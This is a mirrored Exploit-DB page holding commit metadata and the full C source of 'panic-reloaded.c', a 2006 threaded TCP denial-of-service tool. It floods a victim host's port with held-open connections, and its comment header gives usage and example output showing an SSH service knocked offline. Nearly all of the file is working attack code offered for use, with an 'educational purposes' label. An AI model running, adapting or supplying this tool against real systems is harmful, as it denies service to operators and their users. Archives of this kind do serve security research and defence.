exploit-db-mirror/platforms/multiple/dos/1671.c
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

260 lines
5.7 KiB
C
Executable file

/* -----------------------------------------------------------------------------
* ______________________________ __________
* __ ____/_ __ \__ __/__ __/_____ ____ ____ /_ /_
* _ / __ _ / / /_ / __ /_ _ __ / / / /_ /_ __/
* / /_/ / / /_/ /_ / _ __/ / /_/ // /_/ /_ / / /_
* \____/ \____/ /_/ /_/ \__,_/ \__,_/ /_/ \__/
* Security Community
*
* -----------------------------------------------------------------------------
*
* Software for educational purposes
*
* panic-reloaded.c written by hash <hash AT gotfault DOT net>
* <www.gotfault.net>
*
* Description: TCP Denial Of Service Tool. panic-reloaded does
* not require large link or fast internet connection,
* it creates many pthreads, leaving openned connections
* to victim host. It is fast and an efficient way to
* deny a TCP service.
*
* Tested against SSH, FTP, HTTP.
*
* TTY1:
* hash@scarface:~$ gcc -lpthread panic-reloaded.c -o panic-reloaded -Wall
* hash@scarface:~$ ./panic-reloaded3 10.10.10.2 22 20 100 10
* panic-reloaded.c
* written by hash <http://gotfault.net>
* [!] Target: localhost:443
* [!] Threads: 20 for each round
* [*] Countdown: 40 | [!] Sleeping: 10s
*
* TTY2:
* hash@scarface:~$ ssh localhost
* ssh_exchange_identification: Connection closed by remote host
* hash@scarface:~$
*
*
* Greets to folks from gotfault, rfdslabs, tripbit
* and to friends out there.
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <pthread.h>
#define AUTHOR "written by hash <http://gotfault.net>"
void usage(char*);
void sockz(void*);
void header();
void close_func(void *);
char *resolver(char*);
struct pthread_args {
char *host_pthread;
char *port_pthread;
char *slp_pthread;
};struct pthread_args thread_data_array[1];
struct pthread_close {
char *slp_pthread;
int sock_pointer;
};struct pthread_close thread_data[0];
void usage(char *progname) {
header();
printf("Use: %s host port threads rounds sleep_time\n",progname);
printf("host: ip address or hostname\n");
printf("port: victim port\n");
printf("threads: number of threads\n");
printf("rounds: number of reloads, min 40\n");
printf("sleep_time: sleep time between each round\n");
exit(0);
}
void header() {
printf("panic-reloaded.c\n");
printf("%s\n",AUTHOR);
}
void close_func(void *c) {
struct pthread_close *my_close;
char *slp_tmp;
int slp,
err,
sock_p;
my_close = (struct pthread_close *) c;
slp_tmp = my_close->slp_pthread;
sock_p = my_close->sock_pointer;
slp = atoi(slp_tmp);
sleep(slp+1);
if((err = close(sock_p)) < 0) {
printf("close_func: Can`t close socket\n");
exit(-1);
}
}
void sockz(void *t) {
struct sockaddr_in dest;
struct pthread_args *my_data;
pthread_t close_them_all;
char *h,
*p_tmp,
*slp_tmp;
int p,
con,
err,
desc,
slp;
my_data = (struct pthread_args *) t;
h = my_data->host_pthread;
p_tmp = my_data->port_pthread;
slp_tmp = my_data->slp_pthread;
p = atoi(p_tmp);
slp = atoi(slp_tmp);
desc = socket(AF_INET,SOCK_STREAM,0);
if((desc = socket(AF_INET,SOCK_STREAM,0)) < 0) {
perror("sockz: Can`t create socket\n");
exit(-1);
}
dest.sin_family = AF_INET;
dest.sin_port = htons(p);
dest.sin_addr.s_addr = inet_addr(h);
bzero(&(dest.sin_zero),8);
con = connect(desc,(struct sockaddr *)&dest,sizeof(dest));
if(con < 0) {
printf("\nsockz: Can`t connect to %s:%d\n",h,p);
close(desc);
exit(-1);
}
thread_data[0].sock_pointer = desc;
thread_data[0].slp_pthread = slp_tmp;
if((err = pthread_create(&close_them_all,NULL,(void*)&close_func,\
(void*)&thread_data[0]) == -1)) {
printf("sockz: Can`t create thread\n");
exit(-1);
}
}
char *resolver(char *hosttmp){
struct hostent *h;
char *host;
h = gethostbyname(hosttmp);
if(!h) {
printf("resolver: Can`t resolve hostname %s\n",hosttmp);
exit(-1);
}
host = inet_ntoa(*((struct in_addr *)h->h_addr_list[0]));
return host;
}
int main(int ac, char **av) {
if(ac<6)
usage(av[0]);
int x,
y,
z,
err;
char *hosttmp,
*port,
*host,
*slp;
int sockets,
rounds,
slptime,
countdown;
hosttmp = av[1];
port = av[2];
sockets = atoi(av[3]);
rounds = atoi(av[4]); countdown = rounds;
slp = av[5];
slptime = atoi(slp);
if(rounds<40)
usage(av[0]);
host = resolver(hosttmp);
pthread_t threads[rounds];
header();
printf("[!] Target: %s:%s\n",host,port);
printf("[!] Threads: %d for each round\n",sockets);
for(z=0;z<rounds;z++) {
for(x=0;x<sockets;x++) {
thread_data_array[x].host_pthread = host;
thread_data_array[x].port_pthread = port;
thread_data_array[x].slp_pthread = slp;
if((err = pthread_create(&threads[x],NULL,(void*)&sockz,\
(void*)&thread_data_array[x])) == -1){
printf("main: Can`t create thread\n");
exit(-1);
}
for(y=0;y<sockets;y++)
pthread_join(threads[y],NULL);
}
printf("[*] Countdown: %d | [!] Sleeping: %ds\n",countdown--,slptime);
sleep(slptime);
}
printf("Done!\n");
return 0;
}
/*oef*/
// milw0rm.com [2006-04-13]